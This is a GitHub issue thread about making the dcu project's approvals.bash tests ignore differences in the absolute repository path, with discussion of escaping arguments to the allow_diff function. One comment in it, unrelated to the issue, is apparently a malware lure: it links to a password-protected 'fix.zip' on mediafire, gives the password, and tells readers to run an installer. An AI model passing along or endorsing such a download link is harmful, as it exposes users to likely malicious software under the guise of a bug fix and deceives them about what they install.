### ISSUE TITLE
Automatic tests should ignore differences in absolute path to the dcu's directory in outputs

### ISSUE THREAD

**Issue by philipandag** [Dasharo/dcu#15]
It should be possible to implement using newest versions of approvals.bash https://github.com/DannyBen/approvals.bash and the `allow_diff` function. 

Now all tests that print paths in some way fail if the path to the directory containing dcu repo is different than for the person who uploaded the approvals. That will happen, for example, if the username in your system is different.

I tried to do it quickly but it did not work as I imagined and passing $pwd to the function did not work. 

Maybe worth noting, that arguments to `allow_diff` need to be escaped because it pastes the argument directly to `sed` and any slashes will break it. When trying with passing $pwd I made sure that all special characters were escaped but that didn't work and tests continued to fail.

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BeataZdunczyk** [comment]
@philipandag let's close issues only after the PRs are merged and proof of functionality, such as test results, is provided

**Comment by mkopec** [comment]
Closing as tests have been merged and are confirmed to work: https://github.com/Dasharo/dcu/pull/13/checks#step:5:2038
